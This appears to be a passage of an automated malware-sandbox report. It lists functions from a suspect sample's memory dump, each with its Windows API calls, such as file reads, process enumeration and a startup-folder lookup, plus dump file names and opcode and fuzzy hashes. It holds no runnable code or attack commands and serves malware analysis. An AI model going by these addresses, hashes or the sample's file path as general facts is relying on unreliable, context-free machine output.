Uniqueness Score: -1.00%

Function 00FB29B0, Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FB2A8D

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 6ac9a0767665f6ec0bfeda2068dbf66a3743561c5da31f046b74c89db8110748
Instruction ID: 77908af468ad1db158802759b78dc0567b76b2340c5ce5ccbf807c50ddb9a629
Opcode Fuzzy Hash: 6ac9a0767665f6ec0bfeda2068dbf66a3743561c5da31f046b74c89db8110748
Instruction Fuzzy Hash: 6331CBB9600612DFC754DF29C981A62F3E4FF09310B04C569D989CB756E734E852EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FB31B0, Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FD7CC0

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 494099315c537b4b9d9c1223876e8c58e62294bcc141362cde65d70949b497e2
Instruction ID: 702530a2bfa96530f112375346dc95d8292df4cf60be4ef800b158df1da23e59
Opcode Fuzzy Hash: 494099315c537b4b9d9c1223876e8c58e62294bcc141362cde65d70949b497e2
Instruction Fuzzy Hash: 1631A170A04201DFC724EF68C8819AAB3F5FF58304B24845EE4968B352EB36EE51DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FBE1B0, Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,00002000,00000000,?), ref: 00FBE248

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: caf17cfc28c3008ebbaf451da8bdf64bd0c9e84b17537f5aff3007b2bda0c16e
Instruction ID: 1d5f2107e74e70da51364a35445569ef869ee31efa184e227768489d1a830bc5
Opcode Fuzzy Hash: caf17cfc28c3008ebbaf451da8bdf64bd0c9e84b17537f5aff3007b2bda0c16e
Instruction Fuzzy Hash: B3312D71E047059FCB24DE6ED8849DAB7FABB88720B14CA2DE45A87700D634E9459F60

Uniqueness

Uniqueness Score: -1.00%

Function 00FFC02F, Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FFC127

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: cf56aecaa0e567e4c8948b83c681df3d455ba6f49d8c06bb6146a26d60b09b4b
Instruction ID: 9efcf7763380d7b5861d3ec4ae71a089d9b67c98b12ad7fd42d5eb4dd50fb27d
Opcode Fuzzy Hash: cf56aecaa0e567e4c8948b83c681df3d455ba6f49d8c06bb6146a26d60b09b4b
Instruction Fuzzy Hash: 5531827160021DEBEF109F16DB456AA3BB8FF40711F20C819FD99DA650EB35D590E780

Uniqueness

Uniqueness Score: -1.00%

Function 00FB9190, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 690f9ed13878081286275760cb0f203af6aee3d85a3726a96125d6a722ddb007
Instruction ID: a8ad84a2cfca2abe411c0f193bf87cb53378b00919be61d5ca7738cda3544ab4
Opcode Fuzzy Hash: 690f9ed13878081286275760cb0f203af6aee3d85a3726a96125d6a722ddb007
Instruction Fuzzy Hash: DC11AEB9908202CBC6209F1ADC8AF6A73B5BF41710B28480EE68187616C779E890FF51

Uniqueness

Uniqueness Score: -1.00%

Function 0101F356, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 0101F386

Part of subcall function 00FE198A: _memmove.LIBCMT ref: 00FE19CA

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Window_memmove
String ID:
API String ID: 517827167-0
Opcode ID: ab49d3873d16964365d9a3ce6b3eb61336587989f8a4e0459c1a56b3b194ab3e
Instruction ID: 49e123ac186e05ad7ee251efd8df491fa00e0207a3e5083eb1f53a2e56738fe7
Opcode Fuzzy Hash: ab49d3873d16964365d9a3ce6b3eb61336587989f8a4e0459c1a56b3b194ab3e
Instruction Fuzzy Hash: 3711A57330451A7AE244BA69EC90EFEF75CEF91360F008127FE8896101CA7DA91997F0

Uniqueness

Uniqueness Score: -1.00%

Function 0100C98D, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetShortPathNameW.KERNEL32 ref: 0100CA1A

Part of subcall function 00FBF220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\33920049\fmkkelc.omp,00FBF1F5,C:\Users\user\33920049\fmkkelc.omp,010590E8,C:\Users\user\33920049\fmkkelc.omp,?,00FBF1F5,?,?,00000001), ref: 00FBF23C

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: NamePath$FullShort
String ID:
API String ID: 4229621559-0
Opcode ID: 4ce5e107be548c3183e5031def19c1326be01473a90c501893f7b0068e3226b8
Instruction ID: b00a0bbb6622d70acecc00bfc78d92af0076d01bf4613b4adb25136e46830a05
Opcode Fuzzy Hash: 4ce5e107be548c3183e5031def19c1326be01473a90c501893f7b0068e3226b8
Instruction Fuzzy Hash: 09119471A002089BEB11EB65DCC5E9AB3E8FF45350F2086AAF555CB341DB30ED448B90

Uniqueness

Uniqueness Score: -1.00%

Function 0100E492, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 00FC14F7: _malloc.LIBCMT ref: 00FC1511

Part of subcall function 00FBF220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\33920049\fmkkelc.omp,00FBF1F5,C:\Users\user\33920049\fmkkelc.omp,010590E8,C:\Users\user\33920049\fmkkelc.omp,?,00FBF1F5,?,?,00000001), ref: 00FBF23C

GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0100E501

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: FullNamePathPrivateProfileString_malloc
String ID:
API String ID: 3364953200-0
Opcode ID: 4baf53ac1c73822a289400cab98245a0621ea2840bd8e70a7fcf30b55206e619
Instruction ID: 0fc6d4ef77aeeecab8eddaa72e49ac1be361b77c8b49ebb2c9ee0a295cea14ac
Opcode Fuzzy Hash: 4baf53ac1c73822a289400cab98245a0621ea2840bd8e70a7fcf30b55206e619
Instruction Fuzzy Hash: C1014075A002097FDB11FBA5DC85CEFB7ACEF55320B008569B8499B341DE34AD458AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FCF597, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00FC12DC,00000000,?,00FC6A7F,?,00FC12DC,00000000,00000000,00000000,?,00FC793E,00000001,00000214,?,00FC12DC), ref: 00FCF5DA

Part of subcall function 00FC7E9A: __getptd_noexit.LIBCMT ref: 00FC7E9A

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 2bac977581d8ce80df28cd0aca2dd414c174c003fa661812b15bb2335f94b1a2
Instruction ID: 70b1ba903edcb383bd9bce258bd11c36c7c9bc67fbc65cd7feb62933c9a7e1bd
Opcode Fuzzy Hash: 2bac977581d8ce80df28cd0aca2dd414c174c003fa661812b15bb2335f94b1a2
Instruction Fuzzy Hash: 9E01F13AA002179BEB289E21DE56F667796AB81770F19893DE8068B190E775CC04E750

Uniqueness

Uniqueness Score: -1.00%

Function 00FB3B40, Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00FB3B92

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d250509a8da48c99570353fd85cc8f900d8ce63899c9c2f5ba07daf9c042f15c
Instruction ID: f5807338222e83a51b3905ca92a42fb80fade3c065f4f57a2084ac6c00902eae
Opcode Fuzzy Hash: d250509a8da48c99570353fd85cc8f900d8ce63899c9c2f5ba07daf9c042f15c
Instruction Fuzzy Hash: 45112571600B019FD720CF16C890BA7B7F8AB80750F10C91EE49A86A54D770FA45DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FB3250, Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FD6CBC

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: a5f4a842f74a2aa38d18937b498abf96a569d0ab0fd43459daff77bbe97b41f9
Instruction ID: 31d460e518197691470b8ee9a7d8c7be1eb03f833dd72fee2685c716fcc51244
Opcode Fuzzy Hash: a5f4a842f74a2aa38d18937b498abf96a569d0ab0fd43459daff77bbe97b41f9
Instruction Fuzzy Hash: 26019A712006009FC328DF6CC942D27B3E9EF99740314882DE48AC7712EB36E802DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FFC141, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00FC14F7: _malloc.LIBCMT ref: 00FC1511

_memmove.LIBCMT ref: 00FFC17E

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _malloc_memmove
String ID:
API String ID: 1183979061-0
Opcode ID: c365c34210ff95b2339fc68297d86fd64c042ffe90da983951cbe4172abaa356
Instruction ID: 08cf990cca114a92f90c49e475fde1cb4554f9b961b7f536a60a2d01b8c8a58b
Opcode Fuzzy Hash: c365c34210ff95b2339fc68297d86fd64c042ffe90da983951cbe4172abaa356
Instruction Fuzzy Hash: 22014835200654AFC321AF58CE41D67B7E9EF9A750710885DF99A87B02CA39BC029BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4B96, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00FC4BE6

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: __lock_file
String ID:
API String ID: 3031932315-0
Opcode ID: 6674870fe83fc09e20954ec7d64720dd3242a99ab84867858dbe892111260e6a
Instruction ID: 354785b3b5e5c39604445188419815902770c7104ace177ebadbcb538342e36c
Opcode Fuzzy Hash: 6674870fe83fc09e20954ec7d64720dd3242a99ab84867858dbe892111260e6a
Instruction Fuzzy Hash: B901257280421AEBCF15AFA08E13F9E7B21AF40760F008159F82455161D73A9A62EF81

Uniqueness

Uniqueness Score: -1.00%

Function 0101FD26, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 0101FD5D

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcscpy
String ID:
API String ID: 3048848545-0
Opcode ID: c268edffd11c4cbb4d224b8625af7d214eeeb5606354a08f8d4cf2e0546bcfa6
Instruction ID: 3ee319fea569c6791da560830a6b822f88b77f18bc063915da96544812ad2a5d
Opcode Fuzzy Hash: c268edffd11c4cbb4d224b8625af7d214eeeb5606354a08f8d4cf2e0546bcfa6
Instruction Fuzzy Hash: BAF05C33114315355610BB66EC42CEBB79CEF97370340061BFA5497181E522B04597F0

Uniqueness

Uniqueness Score: -1.00%

Function 00FB2920, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FD681C

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: fd4eb98bc5c31b184ba657d102e448ce59a1949e6232b37593128c09ce2594a6
Instruction ID: ddbdfa32ee3cfab7d70e1f4335c508d0ede3c01c276ed42e4ee2445a30bac0e1
Opcode Fuzzy Hash: fd4eb98bc5c31b184ba657d102e448ce59a1949e6232b37593128c09ce2594a6
Instruction Fuzzy Hash: FEF082712001019FC369EB6CE946D7773E4EFC9314715856DF05AC7316DA39EC029BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FF3C1D, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FF3C38

Part of subcall function 00FE3D83: EnumProcesses.PSAPI(?,00000800,?,?,00FF3C4D,?,?,?,01058178), ref: 00FE3DA0

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumProcesses_wcslen
String ID:
API String ID: 3303492691-0
Opcode ID: 176c73492f146944d5af10826ba64398f69ffc39716a6c603d8eca907869f252
Instruction ID: 64ab45cc8edd360102b8998d8887f269e17b73b8f643d854efdb1fb2c91a9f57
Opcode Fuzzy Hash: 176c73492f146944d5af10826ba64398f69ffc39716a6c603d8eca907869f252
Instruction Fuzzy Hash: 5DE0E5779001583BD710654ABC89DDF735CDFC6634F040062F60997112A225AE5592F2

Uniqueness

Uniqueness Score: -1.00%

Function 00FD8748, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00FC14F7: _malloc.LIBCMT ref: 00FC1511

Part of subcall function 00FC14F7: std::exception::exception.LIBCMT ref: 00FC1546
Part of subcall function 00FC14F7: std::exception::exception.LIBCMT ref: 00FC1560
Part of subcall function 00FC14F7: __CxxThrowException@8.LIBCMT ref: 00FC1571

_memmove.LIBCMT ref: 00FD877C

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::exception::exception$Exception@8Throw_malloc_memmove
String ID:
API String ID: 620504543-0
Opcode ID: 42f7596553cfce0df12e5f91c787d638f4f97040c8b519316b904b9ff169c032
Instruction ID: c770e7b7408413883c3d110ba0769c4bd0eb7411b8f8e90090206796a7c1eb61
Opcode Fuzzy Hash: 42f7596553cfce0df12e5f91c787d638f4f97040c8b519316b904b9ff169c032
Instruction Fuzzy Hash: 970119B86045429FD704DFA8C9D2F117BA1BF8B344B248198E2098F366DA35E916DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FBE270, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 00FBE288

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3a72ae73d44fbc9d9b26a649f2d1c1173037e9c86088b35ae226ae45cc8624d4
Instruction ID: aa8d5397b424b22f1252590f81e6f00d4e426127df5a64aee5c0ad9011335bb5
Opcode Fuzzy Hash: 3a72ae73d44fbc9d9b26a649f2d1c1173037e9c86088b35ae226ae45cc8624d4
Instruction Fuzzy Hash: C5E01779604208BFC708DFA4D846DAAB7BDEB98201F0082A8FD41D7344E671AE508BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FE397D, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?), ref: 00FE3984

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 698b45898404d0cb376485f9ffe27c6cc82b6b40858f7c2238c8491e418d82bf
Instruction ID: 2aa05b88f73c734da4f08758afc985976da1b571242e57d694508114eda72271
Opcode Fuzzy Hash: 698b45898404d0cb376485f9ffe27c6cc82b6b40858f7c2238c8491e418d82bf
Instruction Fuzzy Hash: F4C08C35440348568E1409EDA54D8E93B8E4942338B442A40F9AC875E6CB77BD93B750

Uniqueness

Uniqueness Score: -1.00%

Function 00FC48E2, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00FC48EF

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
Instruction ID: d13a529a0e960f5a9299230ce3fb73a5e2fbd91edcd23cf2286f066475a52564
Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
Instruction Fuzzy Hash: F6C092B244024C77CF212A82ED03F4A3F5A9BC0B60F048020FB1C191A1EA77EA61A6D9

Uniqueness

Uniqueness Score: -1.00%

Function 0102261D, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000007,00000000,00000000,?), ref: 0102262C

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
